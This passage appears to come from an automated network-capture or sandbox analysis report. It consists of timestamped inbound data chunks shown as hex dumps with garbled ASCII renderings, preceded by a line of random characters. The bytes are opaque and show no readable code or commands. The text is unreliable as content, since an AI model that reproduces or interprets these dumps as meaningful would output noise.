Gm}Sty@f;Xk"q-{L;Mg~\|Mw46wW8I?W0W9Brtz>\|26:agk`QUKvo=]dAd"_#dGOj<^qIbhIpCOPZVsZ4":{e oe
2022-11-03 06:22:07 UTC	180	IN	Data Raw: f0 43 2b 37 fb 12 7f b0 c6 c3 8b b1 61 47 75 a1 ba 4d 79 6e 90 3b 03 8a 0b d7 b6 20 6a 43 b1 b6 a0 e1 57 cd 82 ca 51 2a f5 7e ce 5c 27 28 22 18 9c bd 10 64 09 39 53 fa ce 29 4e 53 25 d5 ec 07 b1 2b 14 4c 87 33 9d 9f 22 f1 2f f5 4a 8c 6c 32 b5 ad 4b aa f1 f3 95 e8 4c fc 66 7e 38 ad cd 40 18 5e 28 5d c9 c1 30 63 ba 81 41 8b bf 42 c0 ad 5d 8c 25 07 f6 f5 c7 72 fd 1d b4 1e bb 52 c1 c4 49 24 73 f7 e9 81 7b c0 21 81 2f 2a 40 38 97 86 18 2b 50 fb 7c fb 28 44 31 97 08 62 89 e3 be a3 6f 1e 2f eb c9 4d 34 53 7a 1d 27 b1 1a e3 e2 9d 7a 9a ad da d0 02 25 cb 36 2f b5 5d 8f e0 71 df 20 e2 ad e5 46 48 9d 4b 24 8f 0b 91 82 01 b0 f5 02 08 05 2a f2 32 cf 24 bc 65 c8 21 64 0e b9 97 6a 99 b8 97 b7 85 fb de 0a 95 b7 e4 72 18 ba 88 1d d2 9e 6b 30 87 eb c5 cd b5 0f b1 b6 39 15 Data Ascii: C+7aGuMyn; jCWQ~\'("d9S)NS%+L3"/Jl2KLf~8@^(]0cAB]%rRI$s{!/@8+P\|(D1bo/M4Sz'z%6/]q FHK$*2$e!djrk09
2022-11-03 06:22:07 UTC	181	IN	Data Raw: b6 d7 89 81 9c 04 5e 68 2e 39 ae 50 c9 7e 02 86 83 ef f0 e1 1e 9b a1 0d c7 d9 62 da 19 32 1e 5d 32 b8 41 e3 5e 10 32 a7 0c 3c 3b 4c 14 05 49 36 c8 e1 5c 58 b7 8b 84 98 3b e9 f1 1f 9c ef ab 62 10 df 57 a5 50 b2 6f b5 8b 22 c5 4c 3a 55 2e 5f 34 68 ed 85 e1 26 05 95 47 1e df 93 42 4c 35 62 f5 ca c8 f1 69 af 29 2b 5a a6 54 b2 d8 d8 ce ad 14 ec d5 7b c6 2f e3 57 93 4d 2d e3 c2 6e 84 6c 1d 8a 96 8e ac 4d 06 8e 0d 79 05 75 4c b5 d9 3f 05 86 74 54 da 11 04 c2 88 f0 15 51 6f e2 25 1b 5d 67 71 15 fc 95 4e ea 46 90 04 38 e3 5c b5 78 28 00 ed 21 f2 24 9e 3f bb 5b dc ae 6e d1 20 fd 7c 22 34 7c 05 f3 20 08 c3 11 1b 9a 8c b3 6e cc c8 c1 39 ff 84 eb 50 6f bf 82 58 4d af cb 9d d4 e8 13 45 82 57 17 3a ff ca 90 41 7c db fa 3d e8 1d 6e 46 fa 60 9b ee 7b 5a ae 20 ef ec 12 aa Data Ascii: ^h.9P~b2]2A^2<;LI6\X;bWPo"L:U._4h&GBL5bi)+ZT{/WM-nlMyuL?tTQo%]gqNF8\x(!$?[n \|"4\| n9PoXMEW:A\|=nF`{Z
2022-11-03 06:22:07 UTC	182	IN	Data Raw: 30 da e3 ad 20 cd 4f f4 e8 4a a8 19 e3 a5 66 36 6b 41 5b 22 ce 3f e2 0f b3 30 70 19 5a d4 b4 df 97 b1 e6 1b b2 a0 a2 f2 e8 22 3b f5 f5 1c e2 98 25 6d e1 fd 0c cc 3c 35 e9 ab 65 3b 07 d5 95 5e bc 86 f8 c2 cf 7b e5 81 86 dd 88 29 97 ce 30 92 7f e8 26 6e 34 ce 24 75 73 97 95 0b 0d 56 32 b3 1f 83 df 19 ad 8c e0 9e 7b 22 99 98 f2 55 ac a7 65 0c ab 59 13 2e ed 45 19 53 89 87 a1 86 e2 d7 de 22 50 9f 1b e6 2e 90 09 9b 42 de c1 42 35 88 ba e3 f0 b0 79 2c 11 1e 69 c6 b1 d8 67 6d 78 cf 60 0a b4 34 d5 a3 43 c3 23 f4 31 af 2d 8a ec 55 97 d8 97 aa bf dc f5 a3 8e bf 86 d3 92 57 38 5d f5 b0 40 9c ba de 25 a4 26 2a c4 6e 15 c9 3a b8 dc 47 67 67 13 f8 26 3d b9 1f 8d b0 cb 22 6f e9 b5 cb b5 27 0a e6 e3 56 f1 df c0 a7 9d 79 e4 3d 15 19 c8 8c c4 f7 c2 ea 91 62 6f 11 26 46 b3 Data Ascii: 0 OJf6kA["?0pZ";%m<5e;^{)0&n4$usV2{"UeY.ES"P.BB5y,igmx`4C#1-UW8]@%&*n:Ggg&="o'Vy=bo&F
2022-11-03 06:22:07 UTC	184	IN	Data Raw: 0e 94 25 f9 28 2f 39 16 68 64 a1 dd 57 9d e8 ba cc 3c 30 ca 0e c1 a4 a9 74 e1 48 86 8d 0e 1a 3d 9e 5c 33 d1 55 6d 3f 3c 77 c4 38 1c 72 de d5 40 e1 09 db 6b 32 27 30 fb 26 69 d5 27 96 9b a6 1b 67 ae 67 d8 d6 ab cf 47 b6 3d 0a 9a e1 7a ae 6e ed 2b 77 da b3 df 28 73 3b 19 ef c6 0b 58 cf 28 5d c6 c0 76 22 9f 13 e9 01 4b 67 52 57 1a bb 06 e1 63 b6 0e c9 8b 48 ee e4 ce 33 a3 93 ab 72 35 12 d1 65 d7 53 c9 90 7b ef 1f 55 a8 eb c4 28 4a 20 0e 29 e2 ce d7 2c 41 4e 16 af 7c 76 30 6d 73 c1 d6 35 b6 14 55 c1 86 0a 13 37 62 42 9a fe 48 4c f3 68 60 57 8d 37 95 f8 2c 0b 1d 73 30 7c 1a 18 fb 65 30 c5 99 b4 79 c6 e1 f6 9f 6b a2 25 9c 63 8b fe e8 9c c3 e7 7f 8a c1 f8 4d 65 c1 d5 d2 c0 88 23 3f 02 5d 07 f3 c4 cb c4 51 4d 3a 82 12 a1 fd 0d ff f5 ad e5 73 ce f1 3b 0b 70 c4 24 Data Ascii: %(/9hdW<0tH=\3Um?<w8r@k2'0&i'ggG=zn+w(s;X(]v"KgRWcH3r5eS{U(J ),AN\|v0ms5U7bBHLh`W7,s0\|e0yk%cMe#?]QM:s;p$
2022-11-03 06:22:07 UTC	185	IN	Data Raw: ee e9 fb dd d2 64 88 fc 7e 03 2e 00 3b bb da 07 35 ca ee 62 f9 1a 46 94 91 b3 84 8c 88 a7 0c 46 c0 cf 5f c4 10 35 30 87 74 c4 a6 8e f7 46 05 d6 91 ee 01 4d ad 36 0f a6 d8 85 83 19 66 ec 91 ae d2 f4 61 28 4a 59 3d 1f 7a ef 2b e8 6b 16 4b 39 8d f1 55 a2 be 89 f9 7d 80 c1 00 a5 10 61 f7 81 bf 00 08 43 18 0b ed d1 da 4f 6c 11 40 7d 6c 50 28 77 c9 64 25 98 01 7b 44 58 7c 89 d0 cc 5e 71 8b f5 42 da 32 25 1d 23 97 98 f5 af 3e eb 6d f3 8f e8 6a 73 5c bd fa 20 ad bf af a2 71 c2 c8 62 99 97 4f 85 f9 f4 03 83 db b8 9f 72 d5 f5 49 aa 33 5f fe 22 07 eb 70 06 8e e9 81 b6 32 7f bb 82 42 ee 65 9e d2 91 63 cd 91 80 82 a8 d9 cb 2c 05 67 92 bf c6 17 46 ec 7d ea a9 8f ab 8d fd 07 d3 8d 68 5c 27 3d c5 48 bd 55 bc 1a 44 bb 73 28 06 07 09 9f e5 3b 2e 60 5c 1f 70 12 78 83 f8 9c Data Ascii: d~.;5bFF_50tFM6fa(JY=z+kK9U}aCOl@}lP(wd%{DX\|^qB2%#>mjs\ qbOrI3_"p2Bec,gF}h\'=HUDs(;.`\px
2022-11-03 06:22:07 UTC	186	IN	Data Raw: 9f f2 f9 20 f5 15 05 01 7b 9f d5 d9 39 68 47 3d 5d 3c ae 95 3c 2a 85 b7 9a 83 38 48 db 98 92 a2 8a 6e 95 07 07 1a e6 3d 19 57 6a ba eb be 62 ce 2c a0 8f a1 5d 86 84 b4 5e 4f af fb 9d 3d ce 87 f0 56 8a eb bc b8 30 7f 61 c5 5c d8 27 38 24 4c 54 a6 a2 e8 a0 02 e4 a9 73 fa 24 aa d2 11 cc 3e db 0b 1b 7f da 18 e9 d6 30 57 46 6f 2e 20 82 71 61 75 68 ff b0 8e e4 99 5f 60 6d aa d9 8f 0a f8 43 1d aa 12 73 0d 8a bd a1 78 70 41 2f b4 7b 51 33 59 7f 68 2c 5e bf 00 64 67 a3 21 b0 53 ce cd ee 78 11 79 99 e0 fe bd 64 54 4a 78 11 c9 99 34 e7 d6 ea 4a 26 0a ce 9b c5 27 79 4b 95 71 ca 94 4f 51 c2 d9 12 8a de 71 b0 ff e3 a8 ca 22 d2 4e dc 80 5d 0e 4e 4e 24 db e5 f1 57 ca d7 3c 47 2a 4d 32 ca ef 85 28 e5 af 85 f8 2a 2c de 6d 05 d4 c3 a7 21 fc 0c 8a 2e d6 75 dd ab 59 f8 b4 78 Data Ascii: {9hG=]<<8Hn=Wjb,]^O=V0a\'8$LTs$>0WFo. qauh_`mCsxpA/{Q3Yh,^dg!SxydTJx4J&'yKqOQq"N]NN$W<GM2(*,m!.uYx
2022-11-03 06:22:07 UTC	187	IN	Data Raw: 97 7c 86 05 cd c8 54 3d 57 0c 89 1e 47 43 21 ee b3 7e 99 9b 0a d4 0a 86 04 91 1c 7d f6 4b a1 b8 84 b8 65 aa 3f d1 11 46 33 bb 64 c3 b0 5c b3 93 8e 34 b8 db b3 81 d0 d2 af 0f ef 71 37 d0 a5 b1 f2 f1 7b 32 99 eb 6b 7c e7 cd e6 0f 72 1d c6 32 65 50 74 34 7d bd 49 b7 5e 11 57 41 7e 3d 90 84 e7 fb 6e f2 e3 aa 0d a2 6c 89 04 84 62 bb a7 ee 3a d2 f0 e2 b2 a0 7c 4b 6b 2d 8b ed 77 98 61 8a 92 6a b6 3e 68 25 95 a3 60 f6 26 58 0c 34 a8 0c 97 1e b8 2f 4a 9c 65 31 29 d7 24 b8 f3 70 0b 8e ed 6c 28 e2 d7 34 3f a5 c9 00 20 95 ad 40 a9 50 e0 3e 5e 4c 16 2a 2f cc f5 a8 b2 43 d0 25 42 5d f6 5f 24 1d 59 fe a6 1d 10 6b d2 31 f7 f3 62 38 cd 75 4a c7 d7 67 53 89 6f 4e f6 c2 e2 5b 85 5f e2 51 8f d6 e2 30 eb 94 1f 0c 0e 44 99 da 5c bc c3 9c 2e 4e 05 ba 72 7a 12 93 14 13 4a 27 d6 Data Ascii: \|T=WGC!~}Ke?F3d\4q7{2k\|r2ePt4}I^WA~=nlb:\|Kk-waj>h%`&X4/Je1)$pl(4? @P>^L*/C%B]_$Yk1b8uJgSoN[_Q0D\.NrzJ'
2022-11-03 06:22:07 UTC	188	IN	Data Raw: f9 71 9b 15 1d 1d 90 9d b9 2b 33 bb 8b ab 68 71 67 42 79 6b b3 30 b9 dd 97 6e d5 ed c4 e4 bf 34 d0 7d d8 21 fa 09 1b 86 a8 6a b3 8e 5e ef c6 1c e1 cb 96 a7 91 7e 0c 6e aa 5f 30 f5 87 9e f6 d4 1c 41 ff 9b e7 db 58 e6 03 ea 06 a5 74 39 03 94 bf 2d c1 ad 77 b6 b4 58 f7 07 fc 10 f3 64 20 32 b8 16 49 a3 65 b4 f6 f9 65 81 2d b8 5b 66 e7 28 e9 89 7d 04 f6 8d d4 e2 cd c6 4b 9e 9d d5 a0 cf a8 d9 7b 83 a0 f2 56 49 9f 37 18 14 4e d3 1f 00 5e e2 f8 e2 87 8e 4e f0 34 e4 69 b0 9e 4a 0d b3 79 62 9c 80 42 ba fa 06 e8 9e 55 01 5b 88 49 42 18 73 ba bb 25 c4 69 f9 56 5c 80 04 5d b8 eb 33 d1 3f 1b 60 1e 30 75 46 42 84 1c 09 77 b4 96 54 f4 55 e6 ad 45 7b 81 3a 7e ef a5 0b 17 a9 f5 ed 37 36 7e 59 24 55 12 3e 50 4b f6 a2 b9 2f 92 33 39 c7 e1 53 e7 77 bf 9e 37 d8 cc 2a a6 3c 7e Data Ascii: q+3hqgByk0n4}!j^~n_0AXt9-wXd 2Iee-[f(}K{VI7N^N4iJybBU[IBs%iV\]3?`0uFBwTUE{:~76~Y$U>PK/39Sw7*<~
2022-11-03 06:22:07 UTC	190	IN	Data Raw: 32 4a ec 18 3c 8c 99 f5 86 9d db bc 20 2a 0a cb d0 e6 88 17 84 07 7f 56 74 28 bc 62 50 84 f2 6e 5a 3d c6 40 2c 11 aa a8 90 06 a9 3c 35 48 e3 e3 53 fc f8 11 51 3f d3 08 06 66 6f 55 a6 97 f1 6c fd ec bf e5 29 27 4b 4f de ed d3 01 c6 f6 1c 15 a4 71 10 81 e6 da 1a 68 90 6c a1 f8 8d e9 51 cc 92 0f 96 a0 d6 fc 32 e5 d5 fc c6 b8 2c 33 c9 51 93 21 0c 95 99 84 3a e9 9e 59 21 74 0b 7a e4 72 43 f7 08 fc 33 79 0e 2d a0 90 e5 3b 7f 73 ae 0e e2 6e 35 e4 d9 14 92 54 60 68 db 7c af 26 a5 cc b3 6a 5e 40 0f 8b 80 a4 f6 60 97 21 12 8f 92 71 3e cf fc 03 9b a3 20 8d b5 b5 e7 e7 c4 33 c4 45 bc dc b8 c6 06 50 2c f3 8a c1 f3 62 af 58 d3 a7 c7 83 47 42 92 b7 f6 fd 32 0e 64 8d 74 ff 24 98 3e e8 48 12 43 3e 1d 97 b8 0c 4f c9 b0 85 65 94 92 ac 81 c0 27 0c 50 ad c9 da 55 48 5a 9f e1 Data Ascii: 2J< *Vt(bPnZ=@,<5HSQ?foUl)'KOqhlQ2,3Q!:Y!tzrC3y-;sn5T`h\|&j^@`!q> 3EP,bXGB2dt$>HC>Oe'PUHZ
2022-11-03 06:22:07 UTC	191	IN	Data Raw: 39 fc e1 28 37 39 70 f9 10 9f 8a 68 59 87 9b 58 64 eb 2e a2 b4 91 97 9b ec 69 71 e7 73 48 48 f8 c7 de df 5e 3a 52 15 07 63 7e 86 29 cd 9d 41 67 1b 8a 04 bc f8 8a a3 ed bd 6d 35 57 b3 64 43 43 12 31 60 d0 31 00 84 b8 63 cf 21 68 5f 1d fc 34 14 8b 93 4a 81 c3 02 f1 9e 29 bd 09 89 7f 93 c4 7e 6d 74 b4 69 98 db f8 21 4f 17 ee 8d 4b 0a d1 89 55 7b 5e 83 41 ad 52 eb 72 32 72 99 3a a7 80 aa 9c 7c 08 af 20 42 b4 1e 5c 0e 25 07 5b 2f eb 2f 68 52 8c 4e c2 f5 fc 63 b9 a6 55 99 aa 53 7a 6c 70 9a e4 b6 5e be a0 63 a2 aa e8 17 cb bd f7 78 56 cf 89 cb 29 f5 ed 79 4a 22 9f b5 14 c4 7d 37 97 4f 4d f9 9d 98 a1 bc 78 4e f0 11 b2 94 1d 30 b6 f1 c4 01 43 a4 05 e2 9d 5d 83 21 dd 9a f4 f0 e4 f7 10 aa 4e 4f bc 7f 0c b0 56 35 7b 86 47 0d e1 54 04 35 4b 98 d7 98 9b d5 4d 9a f3 04 Data Ascii: 9(79phYXd.iqsHH^:Rc~)Agm5WdCC1`1c!h_4J)~mti!OKU{^ARr2r:\| B\%[//hRNcUSzlp^cxV)yJ"}7OMxN0C]!NOV5{GT5KM
2022-11-03 06:22:07 UTC	192	IN	Data Raw: 8e 25 e3 bd 6f 5d 0d ad 43 d6 12 d1 bf 80 d1 73 f2 bc 62 3a 4c b5 48 39 1b 8d 7f 23 70 d8 c4 84 3a 25 e5 a9 34 fe 1c 97 27 91 63 a3 99 8a c4 1a d1 0d 58 70 5f fe 58 c2 41 26 df 73 a5 2c 25 20 8f 81 fc 2c e5 03 a9 91 f0 c9 a6 fd 7e c5 5f c1 da 07 25 2d af ce 85 6a 19 4a e7 21 43 a5 f1 44 c6 30 1f 14 8a b3 e3 74 d2 74 30 47 d1 52 83 0c 1e 32 0e 9b 62 ff 03 9e 5c 50 2e 1b cb 90 32 0d 6e 4d 00 32 d3 cc c9 1f 1f 98 c8 ff aa 28 87 ff e5 71 fa e6 7d e0 02 d6 7a 50 ec e1 78 2f 35 33 fa 47 ca d7 bc bc 26 62 64 a4 8d d9 c0 25 6b 66 b4 54 7a da 0a b0 a6 09 8f 89 4a 4e 68 87 de 06 57 a0 6c b2 77 a0 bd 18 2d 47 09 f5 e6 5b e9 4a 8c df af 48 4b 4c 7a 72 2f 73 74 60 df fd 1b ac 34 e7 c2 eb f6 01 9c b4 8a 48 97 31 5c 0c 08 03 87 79 47 15 df e4 5b 66 e8 fd 63 02 ae df df Data Ascii: %o]Csb:LH9#p:%4'cXp_XA&s,% ,~_%-jJ!CD0tt0GR2b\P.2nM2(q}zPx/53G&bd%kfTzJNhWlw-G[JHKLzr/st`4H1\yG[fc
2022-11-03 06:22:07 UTC	193	IN	Data Raw: e4 7c 8a 32 39 d6 16 c3 5a 0e 86 bf 59 06 12 48 e0 9e 31 44 2d fc 6b c6 8d 8d 86 3e c8 76 30 86 95 9f e2 c0 87 79 a9 f5 8a f0 9a 67 4c 51 ec 07 cc 9b 38 77 78 fb ef 13 3e af 74 0c 01 e6 ec 27 20 8b f1 6b 83 c1 1b 96 9c 3b a0 67 b0 54 5b 23 fd e3 05 27 30 35 79 49 80 94 24 91 aa 81 18 93 40 f3 d9 90 70 16 1b ce 68 27 ca ef Data Ascii: \|29ZYH1D-k>v0ygLQ8wx>t' k;gT[#'05yI$@ph'
2022-11-03 06:22:07 UTC	193	IN	Data Raw: 2e f7 6c 38 af f1 0a e0 11 0b 58 0e 81 d5 60 de 1e b7 d2 5b 10 fe a0 c2 01 38 d7 52 7b 17 b4 78 1b 05 cb 89 3d a9 53 08 88 7a af 2e 5f e0 28 1a 81 61 df 33 df 7e 46 63 e4 c3 b8 4b 73 8d f5 ea 37 5b 84 3c 2a 80 34 db 05 b0 90 5e 5e 3f 3c d4 cc 09 63 a2 fb 50 8b 79 f7 10 6f 51 a1 4f d8 3b ba b0 e4 27 8d 8c 12 55 b2 1c 8e 59 f8 ad 90 e3 bd 6d 9f 4b 88 79 36 83 07 41 68 c4 c1 c0 b9 fe ad 08 7f 8e ef b3 b1 58 ee 19 fc cc 1b e5 4b 5a 39 36 7d ad 5b 59 1f c0 4a ac f4 4e 99 3d a5 2d d7 ee a9 b7 d9 9d 0d 7e 90 73 82 42 67 d1 ea 09 6a 51 92 0f f7 f5 b1 17 81 f5 1d 16 0f 07 9b 8c f2 10 a7 f6 2a d9 47 48 a9 98 b4 45 bd 41 cd 69 d9 78 77 47 18 6d 94 ec c0 c8 88 f0 99 ab 5d 36 a7 a0 1f 7f 86 80 43 7f 9c 83 89 03 d9 d8 1e 50 c9 16 17 b6 32 3d 03 c0 1c 9f 69 bf f5 45 e8 Data Ascii: .l8X`[8R{x=Sz._(a3~FcKs7[<4^^?<cPyoQO;'UYmKy6AhXKZ96}[YJN=-~sBgjQGHEAixwGm]6CP2=iE
2022-11-03 06:22:07 UTC	195	IN	Data Raw: a7 23 3e 59 8c 44 17 44 29 5c 38 1c 32 3c 6c ea 1b b9 8f 10 f5 3b fc 55 81 e0 dc 8a 78 c0 3a bd 2f a2 ae 73 e3 2f 02 7a 8e e5 76 43 54 7c 66 20 ff 95 6f 99 97 7a e7 fe f4 32 71 cd 96 52 02 3d d1 97 02 c2 07 04 4c 34 21 0b c5 ff cb 52 40 e9 8a 77 0b e7 32 4a 4f 21 02 da 19 8a 09 68 de 91 32 28 57 35 c6 45 5c 52 46 9c 7d b8 e8 0c bd 4c d9 a3 4b 10 a0 49 87 28 4f e5 a2 9a 5b 98 62 81 84 ae f6 cf 72 be fa 64 d6 aa bd b9 d3 22 6b 75 e9 cf f8 f9 97 7f cc 2c be ed 0f eb d9 93 50 34 d8 dd 48 2c 02 8f 94 7d 84 c1 d8 8b 95 8e 94 97 e6 97 bc 2d 89 cd 82 e8 1a ca f1 7c ab a8 fd e0 d6 43 1a d3 14 87 ee 09 2b 14 30 94 38 d1 c4 42 20 86 ce 57 f8 90 b7 b0 4f 93 ae d3 df 04 76 84 41 19 4c 8b 59 17 d6 ee 67 48 fb e9 57 66 a5 da ef 1e 7e 16 4e a1 04 f6 07 af ae dc 9d df ad Data Ascii: #>YDD)\82<l;Ux:/s/zvCT\|f oz2qR=L4!R@w2JO!h2(W5E\RF}LKI(O[brd"ku,P4H,}-\|C+08B WOvALYgHWf~N
2022-11-03 06:22:07 UTC	196	IN	Data Raw: b9 1b 04 b7 6a 7f 9e 94 29 dd b8 53 65 2a 67 23 30 28 0d ce 83 bb 00 dd a3 74 18 ee 08 7e ec e6 49 b5 20 c2 80 12 2f 44 22 69 81 3b cb 20 09 80 74 2a 16 f0 b6 75 22 e4 91 d2 a3 3e f7 4e 77 3c eb 10 63 0b e1 33 a5 72 e5 ac 64 df 15 d0 b8 8a 9d e4 49 55 4c 62 c2 01 0b 76 9b 11 e9 9d 1c f4 2d 5a e1 1a c8 c8 d4 1d d5 e7 9f 3f cb ec b1 8c 5d 32 7d df fc ab 7d f4 29 a5 87 cb 66 7e e3 ff 8d 44 b5 d8 e4 ef b8 ef dc 60 02 f1 41 65 33 c2 88 b7 8c 5b 4f 82 1d a0 6c 73 f1 79 32 f1 1c 37 7d 46 5d 1d 9f 2c 6b 4d df 08 3d cc 35 a3 7c 94 9a 46 55 20 a1 13 23 ed e9 a4 44 c8 84 dd 25 91 e5 e3 d5 63 dd 07 7e d5 2a 17 ce bf 87 1d ca a3 97 ab 1d cf 35 e8 7f 39 ce 05 93 f7 40 d1 26 15 32 4d be 29 82 0a 92 84 4f 3a a1 db 52 96 72 ea 1b 5e f5 9b 69 c2 91 95 9d 09 b9 85 04 8b fa Data Ascii: j)Seg#0(t~I /D"i; tu">Nw<c3rdIULbv-Z?]2}})f~D`Ae3[Olsy27}F],kM=5\|FU #D%c~*59@&2M)O:Rr^i
2022-11-03 06:22:07 UTC	197	IN	Data Raw: 5d 3a 3f 10 71 34 e7 2b b8 ba ab 18 96 81 1c 70 a5 a7 1a 49 9d c9 65 49 fa 36 f2 83 5c 0f 60 9d 21 89 a0 37 21 06 14 6f 22 5d d1 cc b7 21 70 e1 31 2c 2a 0a 9b 64 91 87 91 e4 53 68 1d 8b 23 57 aa 78 51 4c 01 ee f1 35 46 de 78 29 9b 0d f7 83 7e 20 93 13 23 ae 8a 46 1b 3f 3a 62 dd 0a 47 86 7d c1 76 f3 ef 64 a8 69 49 60 de a4 3c 16 01 98 9b 79 1c d6 ac 2d e0 8f 4e fa bd 26 1d db 8c 3b cc aa 7c 78 d7 93 bc f6 64 c5 b2 01 e6 89 03 97 5a 2c a2 12 97 3e 17 94 0b 74 4f 7a 28 0b 19 16 4c da 73 87 c4 f5 e6 54 97 ac 9b dc 06 60 8c af b0 06 a0 44 27 19 46 72 ff 21 4b 30 0f 1b 2d 34 6e 3c 49 c2 0c 6f 81 b9 88 20 7d a8 81 be 49 5a 95 dd 23 80 47 c1 0e 00 59 05 bd a7 82 7b c8 99 96 e2 09 fc df 3a 65 ff bb da a4 fc 3f bf 96 9d 6f 59 ae 8c b9 a9 39 f4 0d 27 e1 79 ff 78 ff Data Ascii: ]:?q4+pIeI6\`!7!o"]!p1,*dSh#WxQL5Fx)~ #F?:bG}vdiI`<y-N&;\|xdZ,>tOz(LsT`D'Fr!K0-4n<Io }IZ#GY{:e?oY9'yx
2022-11-03 06:22:07 UTC	198	IN	Data Raw: 41 5a 07 ac 12 00 5f fd d3 9b 83 2b 51 a7 78 e9 49 75 f8 01 f9 d6 01 71 29 7e f8 d9 3d 73 b9 b6 0c 89 70 95 d8 ee 84 fc 96 a8 09 9e 78 f5 ff a0 eb 60 d0 7d 31 11 16 77 75 d5 25 35 c1 98 76 a5 34 67 d8 ad c6 ef dc 3c ef 33 3a 15 51 c2 ba fc fa 8a 5c f3 59 d4 df f4 44 ee ff 52 72 bd 7e aa 28 bb 5c b8 e1 e8 63 52 02 3a 07 8d 6f d1 15 5b 96 56 13 72 38 13 33 14 bb de 60 ee 4d f0 b6 f7 2d ca 07 02 6c 9b 8c 34 4d 0a 8c c3 e4 f1 84 8d dd a6 13 11 00 34 5e 67 ab f0 de 45 80 a5 5b c9 9c 5c ec 74 2b da f8 8d 53 09 bd 22 8e 35 7a 6e ad b8 d4 77 9f 06 5c d1 e4 ff a7 1f ef 0f 20 fe 22 56 92 9e 24 bd c3 d2 17 0d a5 e7 97 4f 5f 33 13 70 d4 89 63 6f 72 c1 b9 b8 f2 1c 93 d1 5b 16 9e 7c ef ab 1b 88 e1 9b 8f 4b 8d 0a 2a dd 66 da 1c 01 e4 35 e5 c6 15 d6 3d 21 69 b3 9d 32 0d Data Ascii: AZ_+QxIuq)~=spx`}1wu%5v4g<3:Q\YDRr~(\cR:o[Vr83`M-l4M4^gE[\t+S"5znw\ "V$O_3pcor[\|K*f5=!i2
2022-11-03 06:22:07 UTC	200	IN	Data Raw: f9 91 43 4e b7 38 7b 92 cd 4c 17 4a 25 ec cf 51 b3 ea e1 f9 99 c3 dd 57 d7 35 54 da f1 50 a8 43 9e 3c 57 10 03 f9 68 b8 9c 00 92 e8 d6 ef 3b 5a 99 be cb a1 93 f7 a0 6e 6d dc 6e 0c e0 c8 b5 38 c6 e1 b7 18 ac e3 0e 3d b3 dd a5 2e 17 58 6b 12 ad 61 7b 7b e9 b1 f8 a9 45 8b 73 49 94 98 33 97 8d f4 96 43 8b 35 98 98 0b a3 15 bb b6 3e 38 95 6d 06 c7 01 32 d8 2e 02 ca 72 6d 01 9f 6c 62 5e b7 5a 1d 05 4e af 66 47 11 a8 c6 f8 63 26 9d 41 b2 00 b1 60 37 4d 4b 9b 76 56 e2 78 81 de 92 8d 99 d2 6f f0 da db 39 2a 07 fe 61 7b 08 88 ee 1a 24 e3 3a ac 85 f4 b8 28 94 db 7d 42 14 86 f4 40 b9 8f db cb d6 67 e4 8e e5 e0 60 0e 55 aa be 51 aa 46 ec 7e 75 ad 5f 95 da b2 ef ef 4b 95 2f f1 9c 40 d6 a7 dc 25 8c d5 c5 34 f3 a6 0b d3 11 52 5f 07 15 2d 84 fb a2 d1 c6 45 f4 fc 5e 9d e7 Data Ascii: CN8{LJ%QW5TPC<Wh;Znmn8=.Xka{{EsI3C5>8m2.rmlb^ZNfGc&A`7MKvVxo9*a{$:(}B@g`UQF~u_K/@%4R_-E^
2022-11-03 06:22:07 UTC	201	IN	Data Raw: da dc 19 eb ef 0a dc 0e c3 65 71 64 ca d8 1c 1a 94 c9 1f fe 8f 8a 2b 6a af 33 b9 b5 29 7e 89 09 89 c4 f8 0c 18 19 ca 45 d4 73 33 6d 18 8b 10 ed 5e c9 ab 52 c2 33 f7 ad fb 24 de 99 85 0d fb 70 42 b1 65 b9 33 a8 db 5b 26 02 bf f1 5d f2 31 16 6e 29 28 dd f2 81 41 f1 32 74 7e 8f 88 6c cf eb 50 c8 12 d3 d4 d7 97 ba 72 49 1e ac d9 d2 ad 1c 42 17 73 e2 85 41 be 6e b2 60 c4 40 89 80 76 af ec dc 23 46 4a de b3 f6 7a 01 ed 71 13 eb e1 97 11 89 19 83 e7 ca 52 55 5f 88 16 22 b8 3f 59 50 38 5e 58 bc 31 42 6b 6c f2 48 3c c3 db a0 b1 38 61 d5 7e 45 f4 6e 53 93 41 06 7f 06 7b a8 69 1c a1 d1 bc 36 22 93 f3 13 c9 8c f9 93 3d a8 af 09 84 2d 8c 86 3c d7 76 c4 b3 27 83 0e 6f 36 6d 5e 11 9d 93 1d 12 c4 7c db 1e df fe fe 2e 45 c1 0d 74 25 cb 83 31 b6 41 d9 59 93 a0 29 54 d6 a0 Data Ascii: eqd+j3)~Es3m^R3$pBe3[&]1n)(A2t~lPrIBsAn`@v#FJzqRU_"?YP8^X1BklH<8a~EnSA{i6"=-<v'o6m^\|.Et%1AY)T
2022-11-03 06:22:07 UTC	202	IN	Data Raw: 42 44 72 4b 01 52 64 84 5a 0e e0 c8 5e 1c c7 63 58 66 cb 57 be 10 fa fc d0 5d 02 64 f5 a5 9b eb e1 6e 11 c8 5a 1d 28 fc 30 a5 da 8b 22 1a b1 26 05 5e 5c ac 4c b4 b4 58 0e 64 0f 15 51 36 78 3a 8f 0e 0f 55 ff db 1a 11 56 cb 22 c1 81 e1 ca 44 f9 75 8b 13 54 be 85 ae 01 d6 4a c3 ff 8d 7d d7 82 75 9a 98 31 05 da c4 9e c7 6e f8 5e ee 44 6b c0 c5 97 02 2b fb c9 73 17 57 51 1b 8f a9 e2 41 a8 61 09 e4 eb f9 f6 4f 39 82 99 d6 a3 f4 96 5b 58 e5 0d 40 9c 5e c3 73 80 15 96 b8 ea 90 bb 46 dc ed 4e 90 af 48 40 1d 12 a1 5c f8 4f ab 34 5d eb bb 19 ca de cf c2 75 1a c5 3a 25 27 2d b9 ee c0 40 db e9 bc 78 10 17 ef f0 0d a3 74 c3 2f a4 67 48 f9 7b c6 4d 8d 00 9d 60 bd 7a 99 ac b3 e4 9f 55 f4 8a 2d bc bb 48 8f 43 b1 56 4f bf e3 83 c3 50 a2 ac 79 95 e8 c9 30 4d 2e 13 ad 43 f9 Data Ascii: BDrKRdZ^cXfW]dnZ(0"&^\LXdQ6x:UV"DuTJ}u1n^Dk+sWQAaO9[X@^sFNH@\O4]u:%'-@xt/gH{M`zU-HCVOPy0M.C
